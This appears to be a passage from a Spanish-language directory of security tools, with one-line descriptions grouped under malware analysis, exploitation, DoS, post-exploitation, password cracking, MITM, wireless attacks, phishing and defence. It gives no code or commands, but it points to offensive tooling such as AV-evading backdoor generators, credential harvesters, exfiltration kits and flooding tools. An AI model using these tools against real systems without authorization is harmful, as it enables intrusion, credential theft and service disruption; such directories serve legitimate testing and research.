      ApkAnalyser: Una herramienta de análisis virtual estática para examinar y validar el trabajo de desarrollo de su aplicación de Android.
      APKinspector: Una poderosa herramienta GUI para que los analistas analicen las aplicaciones de Android.
      Argus-SAF: Marco de análisis estático de Argus.
      CFGScanDroid: Control Flow Graph Scanning para Android.
      ConDroid: ejecución simbólica / concólica de aplicaciones de Android.
      DroidLegacy: Scripts de análisis estático.
      Floss: FireEye Labs Obfuscated String Solver. Extrae automáticamente las cadenas ofuscadas del malware.
      FSquaDRA: Detección rápida de aplicaciones de Android reenvasados basadas en la comparación de los archivos de recursos incluidos en el paquete.
      Inspeckage: Inspector de paquetes de Android, análisis dinámico con ganchos de api, iniciar actividades no expuestas y más.
      Maldrolyzer: Framework sencillo para extraer datos "procesables" del malware de Android (C&C, números de teléfono, etc.).
      Peepdf: Una herramienta de Python para explorar archivos PDF con el fin de averiguar si el archivo puede ser dañino o no. El objetivo de esta herramienta es proporcionar todos los componentes necesarios que un investigador de seguridad podría necesitar en un análisis PDF sin utilizar 3 o 4 herramientas para realizar todas las tareas.
      PEfile: Lee y funciona con archivos Portable Executable (aka PE).
      PEview: Una forma rápida y fácil de ver la estructura y el contenido de los archivos Portable Executable (PE) de 32 bits y de formato de archivo de objetos componentes (COFF).
      Pdfminer: Una herramienta para extraer información de documentos PDF.
      PScout: Analizando la Especificación de Permiso de Android.
      Smali-CFGs: Smali Control Flow Graph's.
      SmaliSCA - Análisis de código estático de Smali.
      Suite Sysinternals: las utilidades de solución de problemas de Sysinternals.
      Yara: Identifica y clasifica muestras de malware.

      Red

      Análisis de red

      Bro: Un potente marco de análisis de red que es muy diferente de los IDS típicos que quizás conozcas.
      Pytbull: Framework de prueba de IDS / IPS flexible basado en Python.
      Sguil: Sguil (pronunciado sgweel) es construido por analistas de seguridad de red para analistas de seguridad de red. El componente principal de Sguil es una GUI intuitiva que proporciona acceso a eventos en tiempo real, datos de sesión y capturas de paquetes sin formato.

      Servicios fakes

      DNSChef: Proxy DNS para analizadores de penetración y analistas de malware.
      DnsRedir: Un pequeño servidor DNS que responderá a ciertas consultas con direcciones provistas en la línea de comando.

      Manipulación de paquetes

      Pig: Una herramienta de elaboración de paquetes de Linux.
      Yersinia: Una herramienta de red diseñada para aprovechar algunos debilitamientos en diferentes protocolos de red. Pretende ser un marco sólido para analizar y probar las redes y sistemas implementados.

      Sniffers

      Cloud-pcap: Almacenamiento y análisis web PCAP.
      Dnscap: utilidad de captura de red diseñada específicamente para el tráfico de DNS.
      Dripcap: Analizador de paquetes cafeínado.
      Dsniff: Una colección de herramientas para auditoría de redes y pentesting.
      Justniffer: No es solo un Sniffer de paquetes TCP de red. Justniffer es un analizador de protocolo de red que captura el tráfico de red y produce registros de forma personalizada, puede emular los archivos de registro del servidor web Apache, rastrear los tiempos de respuesta y extraer todos los archivos "interceptados" del tráfico HTTP.
      Moloch: Moloch es un sistema de captura, indexación y base de datos completo y de PCAP a gran escala de fuente abierta.
      Net-creds: Esnifa datos confidenciales de la interfaz o pcap.
      NetworkMiner: Herramienta de análisis forense de red (NFAT).
      Netsniff-ng: Una navaja suiza para su instalación diaria de redes de Linux.
      OpenFPC - OpenFPC es un conjunto de scripts que se combinan para proporcionar una grabadora de tráfico de red ligera y paquetes completos y una herramienta de almacenamiento en búfer. Su objetivo de diseño es permitir que los usuarios no expertos implementen una grabadora de tráfico de red distribuida en el hardware COTS mientras se integran en las herramientas existentes de alerta y registro.
      PF_RING: PF_RING ™ es un módulo de kernel de Linux y un marco de espacio de usuario que nos permite procesar paquetes a altas tasas y al mismo tiempo proporcionar una API consistente para las aplicaciones de procesamiento de paquetes.
      WebPcap: Un analizador de paquetes basado en la web (arquitectura cliente / servidor). Útil para analizar aplicaciones distribuidas o dispositivos integrados.
      Wireshark: un analizador de paquetes de código abierto y gratuito.

      Pentesting de Seguridad

      DoS

      DHCPig: Secuencia de comandos de agotamiento de DHCP escrita en python con una biblioteca de red scapy.
      LOIC: Cañón de iones de órbita baja - Una herramienta de tensión de red de código abierto, escrita en C#. Basado en el proyecto LOIC de Praetox.
      Aplicación Sockstress - Sockstress (TCP DoS).
      T50: La herramienta de estrés de red más rápida.
      Torshammer: Martillo de Tor. Herramienta lenta de publicación de DDOS escrita en python.
      UFONet: Abusa OSI Layer 7-HTTP para crear / administrar 'zombies' y para llevar a cabo diferentes ataques usando; GET/POST, multihebra, proxies, métodos de spoofing de origen, técnicas de evasión de caché, etc.

      Exploiting

      BeEF: El Proyecto de Marco de Explotación del Navegador.
      Commix: Herramienta automatizada de inyección y explotación de comandos del sistema operativo todo en uno.
      DLLInjector: inyecta dlls en procesos.
      Drupwn: Herramienta de enumeración y explotación de Drupal.
      ExploitPack: Herramienta gráfica para pruebas de penetración con muchos exploits.
      Evilgrade: El marco de explotación de la actualización.
      Fathomless: Una colección de diferentes programas para el trabajo red team.
      Linux Exploit Suggester: Linux Exploit Suggester, basado en el número de versión del sistema operativo.
      Metasploit Framework: Marco de explotación.
      Nessus: Evaluación de vulnerabilidad, configuración y cumplimiento.
      Nexpose: Software de Gestión de Riesgos y Gestión de Vulnerabilidades.
      OpenVAS: Explorador y administrador de vulnerabilidades de código abierto.
      PowerSploit: Un marco de post-explotación de PowerShell.
      PSKernel-Primitives: Primitivas de explotación para PowerShell.
      ROP Gadget: Marco para la explotación de ROP.
      Routersploit: Software automatizado de prueba de penetración para el enrutador.
      Rupture: Un framework para BREACH y otros ataques de cifrado basados en compresión.
      Shellen: Entorno de shelling interactivo para crear fácilmente shellcodes.
      Shellsploit: Permite generar shellcodes personalizados, puertas traseras e inyectores para varios sistemas operativos. Y vamos a ofuscar cada byte a través de codificadores.
      SPARTA: Herramienta de prueba de penetración de infraestructura de red.
      Spoodle: Un subdominio masivo + escáner de vulnerabilidad poodle.
      Veil Framework: Una herramienta diseñada para generar cargas útiles de metasploit que evitan las soluciones antivirus comunes.
      Vuls: Escáner de vulnerabilidad para Linux / FreeBSD, sin agente, escrito en Go.
      Explorador de Windows Suggester: Detecta posibles parches faltantes en el destino.
      Zarp: Herramienta de ataque de red.

      Exploits

      Bluedroid: PoCs de vulnerabilidades en BlueDroid.
      Chakra-2016-11: Exploit de prueba de concepto para bugs Edge (CVE-2016-7200 y CVE-2016-7201).
      CVE-2018-8120: CVE-2018-8120.
      CVE-2018-8897: Implementa la vulnerabilidad POP / MOV SS (CVE-2018-8897) mediante la comprobación de errores de la máquina (DoS local).
      HolicPOC: CVE-2015-2546, CVE-2016-0165, CVE-2016-0167, CVE-2017-0101, CVE-2017-0263, CVE-2018-8120.
      Jira-Scan: Escáner Jira para CVE-2017-9506.
      MS17-010: Exploits para MS17-010.
      Ruby-advisory-db: Una base de datos de Ruby Gems vulnerable.
      The Exploit Database: El repositorio oficial de Base de datos Exploit.
      Exploits XiphosResearch : Código de explotación de prueba de concepto diverso escrito en Xiphos Research para fines de prueba.

      Recolección de información

      Bundler-audit: Verificación del nivel de parche para Bundler.
      Dnsenum: Una secuencia de comandos de Perl que enumera la información de DNS.
      Dnsmap: Correlacionador pasivo de red DNS.
      Dnsrecon: Script de enumeración de DNS.
      Knock: Una herramienta de python diseñada para enumerar subdominios en un dominio objetivo a través de una lista de palabras.
      IVRE: Un marco de código abierto para reconocimiento de red. Se basa en herramientas conocidas de código abierto para recopilar datos (inteligencia de red), almacenarlos en una base de datos y proporciona herramientas para analizarlos.
      Operative Framework: Este es un marco basado en la acción de huellas dactilares, esta herramienta se utiliza para obtener información en un sitio web o un objetivo de empresa con múltiples módulos (búsqueda de Viadeo, búsqueda de Linkedin, whois de correo electrónico inverso, Whois inverso de ip, análisis forense de archivos SQL ... .).
      Recon-ng: Un marco de reconocimiento Web completo con todas las funciones escrito en Python.
      SMBMap: Una útil herramienta de enumeración de SMB.
      SSLMap: Escáner de suite de cifrado TLS / SSL.
      Subbrute: Una araña de meta-consulta de DNS que enumera registros DNS y subdominios.
      SubFinder: Herramienta de descubrimiento de subdominios que descubre subdominios válidos para sitios web. Diseñado como un marco pasivo para ser útil para recompensas de errores y seguro para pruebas de penetración.
      TruffleHog: busca en repositorios de git cadenas de alta entropía, profundizando en el historial de confirmaciones.
      URLextractor: Recopilación de información y reconocimiento de sitios web.
      VHostScan: Escáner de host virtual que realiza búsquedas inversas, se puede usar con herramientas pivote, detectar escenarios catch-all, alias y páginas predeterminadas dinámicas.
      Wmap: Recopilación de información para piratería web.
      XRay: Una herramienta para reconocimiento, mapeo y recolección de OSINT de redes públicas.

      Fuzzing

      AndroFuzz: Una utilidad de fuzz para Android que se centra en la información y las partes de entrega del proceso de fuzzing.
      Construct: Estructuras de datos declarativas para python que permiten el análisis sintáctico y la construcción.
      Fusil: Una biblioteca de Python utilizada para escribir programas de fuzzing. Ayuda a iniciar el proceso con un entorno preparado (límite de memoria, variables de entorno, redirección de stdout, etc.), iniciar cliente o servidor de red y crear archivos dañados.
      Fuzzbox: Una herramienta de fuzzing multimedia de varios códecs.
      Fuzzlyn: Fuzzer para las cadenas de herramientas .NET, utiliza a Roslyn para generar programas aleatorios de C#.
      Honggfuzz: Fuzzer orientado a la seguridad con poderosas opciones de análisis. Admite un fuzz evolutivo basado en la retroalimentación basado en la cobertura del código (sw y hw).
      Melkor-android: Un puerto Android del fuzzer melkor ELF.
      MFFA: Media Fuzzing Framework para Android.
      Netzob: Netzob es una herramienta de código abierto para ingeniería inversa, generación de tráfico y fuzzing de protocolos de comunicación.
      Python-AFL: Servidor de bifurcación americano e instrumentación para código Python puro.
      Radamsa-android: Un puerto Android de radamsa fuzzer.
      SecLists: Una colección de múltiples tipos de listas utilizadas durante las evaluaciones de seguridad.
      Sulley: El desarrollo de Fuzzer y el marco de prueba de fuzz que consta de múltiples componentes extensibles.
      TAOF: The Art of Fuzzing, incluido ProxyFuzz, un fuzzer de red no determinista de hombre en el medio.
      Windows IPC Fuzzing Tools: Una colección de herramientas utilizadas para atacar aplicaciones que usan los mecanismos de comunicación de Windows Interprocess.
      Zulu: Un fuzzer diseñado para el prototipado rápido que normalmente ocurre en un compromiso del cliente donde algo necesita ser transferido dentro de escalas de tiempo ajustadas.

      Pentesting Móvil

      AFE: Android Framework for Exploitation, es un marco para explotar dispositivos basados en Android.
      AndroBugs: Un escáner de vulnerabilidad de Android eficiente que ayuda a los desarrolladores o hackers a encontrar posibles vulnerabilidades de seguridad en las aplicaciones de Android.
      Android-vts: Android Vulnerability Test Suite: siguiendo el espíritu de la recopilación de datos abiertos, y con la ayuda de la comunidad, analicemos el estado de la seguridad de Android.
      Androl4b: Una máquina virtual para evaluar aplicaciones de Android, ingeniería inversa y análisis de malware.
      CobraDroid: Una compilación personalizada del sistema operativo Android diseñada específicamente para analistas de seguridad de aplicaciones y para personas que manejan malware móvil.
      Drozer: El marco de evaluación de seguridad líder para Android.
      Idb: Una herramienta para simplificar algunas tareas comunes para iOS pentesting e investigación.
      Introspy-iOS: Perfil de seguridad para blackbox iOS.
      JAADAS: Asesoramiento Conjunto de Defectos Avanzados para aplicaciones de Android.
      Mobile Security Framework: Un marco de prueba de pluma automatizado inteligente, todo en uno, de aplicación de código abierto (Android / iOS / Windows) capaz de realizar análisis estáticos, dinámicos y pruebas de API web.
      QARK: QARK de LinkedIn es para que los desarrolladores de aplicaciones escaneen la aplicación en busca de problemas de seguridad.

      MITM (Man In The Midle)

      Dnsspoof: DNS spoofer. Elimina las respuestas de DNS del enrutador y lo reemplaza con la respuesta de DNS falsificada.
      Ettercap: Una suite completa para hombres en medio de ataques. Cuenta con olfateo de conexiones en vivo, filtrado de contenido sobre la marcha y muchos otros trucos interesantes. Es compatible con la disección activa y pasiva de muchos protocolos e incluye muchas características para el análisis de red y host.
      Bettercap: Una herramienta potente, flexible y portátil creada para realizar diversos tipos de ataques MITM contra una red, manipular el tráfico HTTP, HTTPS y TCP en tiempo real, buscar credenciales y mucho más.
      Mallory: Un hombre extensible de TCP / UDP en el proxy intermedio que está diseñado para ejecutarse como una puerta de enlace. A diferencia de otras herramientas de este tipo, Mallory admite la modificación de protocolos no estándares sobre la marcha.
      MITMf: Framework para ataques Man-In-The-Middle.
      Mitmproxy: Un proxy hombre-en-el-medio interactivo con capacidad para SSL para HTTP con una interfaz de consola.
      Mitmsocks4j: El hombre en el medio SOCKS Proxy para JAVA.
      Nogotofail: Una herramienta de prueba de seguridad de tráfico de red blackbox en ruta.
      Responde: Un envenenador LLMNR, NBT-NS y MDNS, con servidor de autenticación rogue HTTP/SMB/MSSQL/FTP/LDAP incorporado compatible con NTLMv1 / NTLMv2 / LMv2, NTLMSSP de seguridad extendida y autenticación HTTP básica.
      Ssh-mitm: Una herramienta de hombre en el medio SSH / SFTP que registra sesiones interactivas y contraseñas.

      Password Cracking

      BozoCrack: un cracker MD5 tonto y efectivo en Ruby.
      Common-substr: Script awk simple para extraer las subcadenas más comunes de un texto de entrada. Creado para descifrar contraseñas.
      HashCat: La herramienta de recuperación de contraseñas más rápida y avanzada del mundo.
      Hob0Rules: Reglas de descifrado de contraseñas para Hashcat basadas en patrones y patrones de la industria.
      John the Ripper: Un rápido cracker de contraseñas.
      THC-Hydra: Un cracker de inicio de sesión de rojo muy rápido que admite muchos servicios diferentes.

      Escaneo de puertos

      Angry IP Scanner: escáner de red rápido y amigable.
      Masscan: Escáner de puerto TCP, arroja paquetes SYN de forma asíncrona, escaneando Internet en menos de 5 minutos.
      Nmap: Escáner de seguridad gratuito para auditorías de seguridad y exploración de redes.
      Watchdog: una exploración de seguridad completa y una herramienta de administración de vulnerabilidades.
      Zmap: un escáner de red de código abierto que permite a los investigadores realizar fácilmente estudios de redes en Internet.

      Post-Explotación

      CrackMapExec: Una herramienta posterior a la explotación que ayuda a automatizar la evaluación de la seguridad de grandes redes de Active Directory.
      CredCrack: Una cosechadora de credenciales rápida y sigilosa.
      Creddump: Vuelque las credenciales de Windows.
      DBC2: DropboxC2 es una herramienta modular de post-explotación, compuesta de un agente que se ejecuta en la máquina de la víctima, un controlador, que se ejecuta en cualquier máquina, módulos de PowerShell y servidores de Dropbox como medio de comunicación.
      DET: Data Exfiltration Toolkit (DET).
      Dnsteal: Herramienta de DNS Exfiltration para enviar sigilosamente archivos a través de solicitudes de DNS.
      Empire: Empire es un agente de post-explotación pura de PowerShell.
      Enumdb: Herramienta de fuerza bruta y post-explotación de MySQL y MSSQL para buscar bases de datos y extraer información confidencial.
      EvilOSX: Una herramienta de python pura, post-explotación, RAT (Remote Administration Tool) para macOS / OSX.
      Fireaway: Herramienta de derivación y auditoría de cortafuegos de nueva generación.
      FruityC2: Un marco posterior a la explotación (y de código abierto) basado en el despliegue de agentes en máquinas comprometidas. Los agentes se administran desde una interfaz web bajo el control de un operador.
      GetVulnerableGPO: Secuencia de comandos de PowerShell para buscar GPO 'vulnerables' relacionados con la seguridad que deberían reforzarse.
      Iodine: Permite canalizar datos IPv4 a través de un servidor DNS.
      Koadic: Koadic C3 COM Command & Control - JScript RAT.
      Mallory: Proxy HTTP / HTTPS sobre SSH.
      Mimikatz: Una pequeña herramienta para jugar con la seguridad de Windows.
      Mimikittenz: una herramienta power-shell post-explotación para extraer información jugosa de la memoria.
      P0wnedShell: PowerShell Runspace Post Exploitation Toolkit.
      ProcessHider: Herramienta posterior a la explotación para ocultar procesos de aplicaciones de supervisión.
      PowerOPS: Herramienta de explotación de publicaciones portátil PowerShell Runspace destinada a hacer que las pruebas de penetración con PowerShell sean "más fáciles".
      Poet: Herramienta post-explotación.
      Pupy: Una administración remota de código abierto (Windows, Linux, OSX, Android) y herramienta posterior a la explotación escrita principalmente en python.
      Pwnat: Perfora agujeros en firewalls y NAT permitiendo que cualquier número de clientes detrás de NAT se conecte directamente a un servidor detrás de un NAT diferente.
      RemoteRecon: Reconocimiento remoto y colección.
      SpYDyishai: Una cosechadora de credenciales de Gmail.
      Tgcd: Una sencilla herramienta de red Unix para ampliar la accesibilidad de los servicios de red basados en TCP / IP más allá de los cortafuegos.
      TheFatRat: Una herramienta fácil de generar backdoor con msfvenom (una parte del marco metasploit). Esta herramienta compila un malware con una carga popular y luego el malware compilado se puede ejecutar en Windows, Android, Mac. El malware que se creó con esta herramienta también tiene la capacidad de eludir la mayoría de la protección de software AV.
      WCE: El Editor de credenciales de Windows (WCE) es una herramienta de seguridad para listar sesiones de inicio de sesión y agregar, cambiar, enumerar y eliminar credenciales asociadas.

      Informes de pentesting

      Dradis - Colaboración y presentación de informes para los equipos de seguridad de TI.
      Faraday: Plataforma colaborativa de prueba de penetración y gestión de vulnerabilidades.

      Servicios

      Sslstrip: Una demostración de los ataques de stripping de HTTPS.
      Sslstrip2: Versión SSLStrip para derrotar a HSTS.
      SSLyze: Escáner de configuración SSL.
      Tls_prober: Fingerprint la implementación SSL / TLS de un servidor.

      Formación en Hacking

      Do not Panic - Training linux bind shell con técnicas anti-ingeniería inversa.
      DVWA: Damn Vulnerable Web Application (DVWA) es una aplicación web PHP / MySQL que es muy vulnerable.
      DVWS: Damn Vulnerable Web Sockets (DVWS) es una aplicación web vulnerable que funciona en sockets web para la comunicación entre el cliente y el servidor.
      OWASP Juice Shop: Una aplicación web intencionalmente insegura para entrenamientos de seguridad escrita enteramente en Javascript que abarca todo el OWASP Top Ten y otros graves fallos de seguridad.
      OWASP NodeGoat: Un entorno para conocer cómo los principales riesgos de seguridad de OWASP se aplican a las aplicaciones web desarrolladas con Node.js y cómo abordarlas de manera efectiva.
      OWASP Railsgoat: Una versión vulnerable de Rails que sigue el Top 10 de OWASP.
      OWASP Security Shepherd: Una plataforma de capacitación en seguridad para aplicaciones web y móviles.
      OWASP WebGoat: una aplicación web deliberadamente insegura.
      RopeyTasks: Aplicación web deliberadamente vulnerable.

      Pentesting Web

      Arachni: Framework de escáner de seguridad de aplicaciones web.
      BlindElephant: Aplicación web Fingerprinter.
      Burp Suite: Una plataforma integrada para realizar pruebas de seguridad de aplicaciones web.
      CMS-explorer: CMS Explorer está diseñado para revelar los módulos, complementos, componentes y temas específicos que varios sitios web controlados por CMS están ejecutando.
      Dvcs-ripper: Rip sistemas de control de versiones accesibles (distribuidos).
      Fimap: Encuentre, prepare, audite, explote e incluso busque automáticamente errores de LFI/RFI en google.
      Joomscan: escáner Joomla CMS.
      Kadabra: LFI Exploiter y Scanner automáticos, escritos en C ++ y un par módulo externo en Python.
      Kadimus: Herramienta de escaneo y explotación LFI.
      Liffy: Herramienta de explotación LFI.
      Netsparker: Escáner de seguridad de aplicaciones web.
      Nikto2: Escáner de vulnerabilidad de aplicaciones web.
      NoSQLMap: Base de datos de Mongo automatizada y herramienta de explotación de aplicaciones web NoSQL.
      OWASP Xenotix: XSS Exploit Framework es un marco avanzado de detección y explotación de vulnerabilidades Cross Site Scripting (XSS).
      Paros: Un proxy HTTP / HTTPS basado en Java para evaluar la vulnerabilidad de la aplicación web.
      Ratproxy: Una herramienta de auditoría de seguridad de aplicaciones web semi-automatizada, en gran medida pasiva, optimizada para una detección precisa y sensible, y una anotación automática, de problemas potenciales.
      Scout2: Herramienta de auditoría de seguridad para entornos AWS.
      Skipfish: Una herramienta de reconocimiento de seguridad de aplicaciones web activa. Prepara un mapa de sitio interactivo para el sitio objetivo llevando a cabo un rastreo recursivo y sondeos basados en el diccionario.
      SQLMap: Inyección SQL automática y herramienta de toma de control de base de datos.
      SQLNinja: Herramienta de inyección y adquisición de SQL Server.
      TPLMap: Herramienta de detección y explotación de inyección de plantilla automática del lado del servidor.
      Yasuo: Un script de ruby que busca aplicaciones web de terceros vulnerables y explotables en una red.
      W3af: Ataque a la aplicación web y marco de auditoría.
      Wapiti: Escáner de vulnerabilidad de aplicaciones web.
      Weevely3: Caparazón web armado.
      WhatWeb: Sitio web Fingerprinter.
      Framework de explotación de Wordpress: Framework de Ruby para desarrollar y utilizar módulos que ayudan en las pruebas de penetración de sitios web y sistemas con tecnología de WordPress.
      WPScan: WPScan es un escáner de vulnerabilidad WordPress de recuadro negro.
      WPSploit: Explotando Wordpress con Metasploit.
      WS-Attacker: un marco modular para pruebas de penetración de servicios web.
      XSS-payload-list: lista de carga útil XSS.
      Zed Attack Proxy (ZAP): El proyecto central de OWASP ZAP.

      Pentesting Wireless

      Aircrack-ng: Un programa de descifrado de claves 802.11 WEP y WPA-PSK.
      Kismet: Detector de red inalámbrica, sniffer e IDS.
      LANs.py: Inyectar código, bloquear wifi y espiar a los usuarios de wifi.
      Mass-deauth: Secuencia de comandos para la desauthentication de 802.11.
      Reaver: Ataque de fuerza bruta contra Wifi Protected Setup.
      Wifikill: un programa de Python para expulsar a la gente de wifi.
      Wifijammer: Satura continuamente todos los clientes / enrutadores wifi.
      Wifite: Herramienta automatizada de ataque inalámbrico.
      Wifiphisher: Ataques automatizados de phishing contra redes Wi-Fi.

      Ciberseguridad

      Seguridad cloud

      Azucar: herramienta de auditoría de seguridad para entornos Azure.

      Seguridad en endpoint

      AIDE: Advanced Intrusion Detection Environment es un comprobador de integridad de archivos y directorios.
      Duckhunt: Previene ataques de RubberDucky (u otra inyección de teclado).
      Hardentools: una utilidad que desactiva una serie de características riesgosas de Windows.
      Lynis: Herramienta de auditoría de seguridad para Linux, macOS y sistemas basados en UNIX. Ayuda con las pruebas de cumplimiento (HIPAA / ISO27001 / PCI DSS) y el endurecimiento del sistema. Sin agente, e instalación opcional.
      Osx-config-check: Verifica la configuración de tu máquina OS X.
      Xnumon: Supervisor macOS para detectar actividad maliciosa.

      Privacidad

      GoSecure: Un sistema de red privada virtual (VPN) fácil de usar y portátil construido con Linux y una Raspberry Pi.
      I2P: El proyecto de Internet invisible.
      Nipe: Una secuencia de comandos para hacer que Tor Network sea tu puerta de enlace predeterminada.
      SecureDrop: Sistema de envío de denuncia de fuente abierta que las organizaciones de medios pueden usar para aceptar documentos de forma segura y comunicarse con fuentes anónimas.
      Tor: El software gratuito para habilitar el anonimato en línea de enrutamiento onion.

      Ingenieria inversa

      AndBug: Un depurador que apunta a la máquina virtual Dalvik de la plataforma Android diseñada para ingenieros y desarrolladores inversos.
      Angr: Un marco de análisis binario independiente de la plataforma desarrollado por el Laboratorio de seguridad informática de UC Santa Barbara y su equipo CTF asociado, Shellphish.
      Apk2Gold: Otro decompilador de Android.
      ApkTool: Una herramienta para la ingeniería inversa Android archivos apk.
      Barf: Análisis binario y marco de ingeniería inversa.
      BinText: Un extractor de texto pequeño, muy rápido y potente.
      BinWalk: Analiza, aplica ingeniería inversa y extrae imágenes de firmware.
      Boomerang: Descomprime binarios x86 en C.
      Bytecode-viewer: Java 8 Jar y Android APK Reverse Engineering Suite (Descompilador, Editor, Depurador y más).
      Bytecode_graph: Módulo diseñado para modificar el bytecode de Python. Permite agregar o eliminar instrucciones de una cadena de código de byte de Python.
      Capstone: Marco de desmontaje ligero multi-plataforma y multi-arquitectura con enlaces de Python.
      CHIPSEC: Marco de evaluación de la seguridad de la plataforma.
      Coda: Analizador de Coredump.
      Ctf_import: Ejecuta funciones básicas desde binarios sin formato multiplataforma.
      Edb: Un depurador multiplataforma x86 / x86-64.
      Dex2jar: Herramientas para trabajar con archivos android .dex y java .class.
      Distorm: Potente biblioteca de desensamblador para x86 / AMD64.
      DotPeek: Un descompilador de .NET gratuito de JetBrains.
      Enjarify: Una herramienta para traducir bytecode de Dalvik a bytecode de Java equivalente. Esto permite que las herramientas de análisis de Java analicen las aplicaciones de Android.
      Fibratus: Herramienta para explorar y rastrear el kernel de Windows.
      Fino: Una herramienta de análisis dinámica de Android.
      Flare-ida: Utilidades IDA Pro del equipo FLARE.
      Frida: Inyecta JavaScript para explorar aplicaciones nativas en Windows, MacOS, Linux, iOS, Android y QNX.
      Gdb-dashboard: Interfaz visual modular para GDB en Python.
      GEF: Características mejoradas GDB de multi-arquitectura para explotadores e ingenieros inversos.
      Heap-viewer: Un plugin de IDA Pro para examinar el montón de glibc, centrado en el desarrollo de exploits.
      Hopper: Desensamblador / Descompilador de OS X y Linux para ejecutables de Windows / Mac / Linux / iOS de 32/64 bits.
      Idaemu: Es un complemento IDA Pro, se usa para emular código en IDA Pro.
      IDA Free: La versión gratuita de IDA.
      IDA Patcher: IDA Patcher es un complemento para el desensamblador IDA Pro de Hex-Ray diseñado para mejorar la capacidad de IDA de parchar archivos binarios y memoria.
      IDA Pomidor: IDA Pomidor es un complemento para el desensamblador IDA Pro de Hex-Ray que lo ayudará a conservar la concentración y la productividad durante largas sesiones de inversión.
      IDA Pro: Desinstalador y depurador multiprocesador alojado en Windows, Linux o Mac OS X.
      IDA Sploiter: IDA Sploiter es un complemento para el desensamblador IDA Pro de Hex-Ray diseñado para mejorar las capacidades de IDA como una herramienta de desarrollo de vulnerabilidades y desarrollo.
      IDAPython: Un complemento de IDA que hace posible escribir scripts para IDA en el lenguaje de programación de Python.
      Immunity Debugger: Una nueva y poderosa forma de escribir exploits y analizar malware.
      JAD: JAD Java Decompiler.
      Jadx: Descompilar archivos de Android.
      JD-GUI: Tiene como objetivo desarrollar herramientas para descompilar y analizar el código de 5 bytes de Java "y las versiones posteriores.
      Keystone Engine: Un armazón liviano multiplataforma y multi-arquitectura.
      Krakatau: Descompilador, ensamblador y desensamblador de Java.
      Manticore: Herramienta de creación de prototipos para el análisis binario dinámico, con soporte para ejecución simbólica, análisis de contaminación e instrumentación binaria.
      Framework MARA: Una aplicación móvil Ingeniería inversa y Marco de análisis.
      Medusa: Un desensamblador diseñado para ser modular e interactivo.
      MegaDumper: Vuelque ensamblajes nativos y .NET.
      Mona.py: PyCommand for Immunity Debugger que reemplaza y mejora en pvefindaddr.
      OllyDbg: Un depurador x86 que enfatiza el análisis de código binario.
      Paimei: Marco de ingeniería inversa, incluye PyDBG, PIDA, pGRAPH.
      PEDA: Python Exploit Development Assistance para GDB.
      Plasma: Desensamblador interactivo para x86 / ARM / MIPS. Genera pseudocódigo sangrado con código de sintaxis coloreado.
      Procyon: Un decompilador Java de código abierto moderno.
      Pyew: Editor y desensamblador hexadecimal de línea de comandos, principalmente para analizar malware.
      Qira: QEMU Interactive Runtime Analyzer.
      R2MSDN: complemento R2 para agregar las URL de la documentación de MSDN y los nombres de los parámetros a las llamadas a funciones importadas.
      RABCDAsm: Robust ABC (Código de bytes de ActionScript) [Dis-] Ensamblador.
      Radare2: Opensource, framework de ingeniería inversa crossplatform.
      Redexer: Una herramienta de reingeniería que manipula binarios de aplicaciones de Android.
      ScratchABit: Desensamblador interactivo fácilmente redirigible y pirateable con API de complemento compatible con IDAPython.
      Shed: .NET runtime inspector.
      Simplify: Desobfutador de Android genérico.
      Smali: Smali / baksmali es un ensamblador / desensamblador para el formato dex utilizado por dalvik, la implementación Java VM de Android.
      Toolbag: IDA Toolbag es un complemento que proporciona una funcionalidad adicional para el desensamblador Hex-Rays IDA Pro.
      Ufgraph: Un script simple que analiza el resultado del comando uf (desunir función) en windbg y usa graphviz para generar un flujograma de control como PNG/SVG/PDF/GIF (ver la opción -of).
      Uncompile: Descompilar Python 2.7 binarios (.pyc).
      Unicorn Engine: Un marco de emulador de CPU liviano, multiplataforma y multi-arquitectura basado en QEMU.
      Voltron: Un conjunto de herramientas de interfaz de usuario extensible depurador escrito en Python. Su objetivo es mejorar la experiencia del usuario de varios depuradores (LLDB, GDB, VDB y WinDbg) al permitir la conexión de vistas de utilidad que pueden recuperar y visualizar datos del host del depurador.
      WinDbg: Kit de controladores de Windows y WinDbg.
      WinHex: Editor hexadecimal, útil en el campo de la informática forense, la recuperación de datos, el procesamiento de datos de bajo nivel y la seguridad de TI.
      Unlinker: Unlinker es una herramienta que puede extraer funciones de binarios compilados de Visual C ++ y producir archivos de objeto COFF de Visual C ++.
      UPX: The Ultimate Packer para eXecutables.
      X64_dbg: Un depurador x64 / x32 de código abierto para Windows.
      Xxxswf: Una secuencia de comandos Python para analizar archivos Flash.
      YaCo: Un plugin IDA de Hex-Rays. Cuando está habilitado, múltiples usuarios pueden trabajar simultáneamente en el mismo binario. Cualquier modificación realizada por cualquier usuario se sincroniza a través del control de versión de git.

      Ingeniería social

      Framework

      SET: The Social-Engineer Toolkit de TrustedSec.

      Harvester

      Creepy: Una herramienta de geolocalización OSINT.
      Github-dorks: Herramienta de CLI para escanear repos/organizaciones de Github en busca de posibles fugas de información confidencial.
      Maltego: Software propietario para inteligencia de código abierto y análisis forense, de Paterva.
      Metagoofil: Metadata harvester.
      TheHarvester: Cosechadora de nombres de correo electrónico, subdominios y personas.
      TTSL: Herramienta para eliminar a LinkedIn.

      Phishing

      Whatsapp-phishing: Código de prueba de principio para ejecutar un ataque de phishing contra el cliente web oficial de Whatsapp.
      Fuente: Ciberseguridad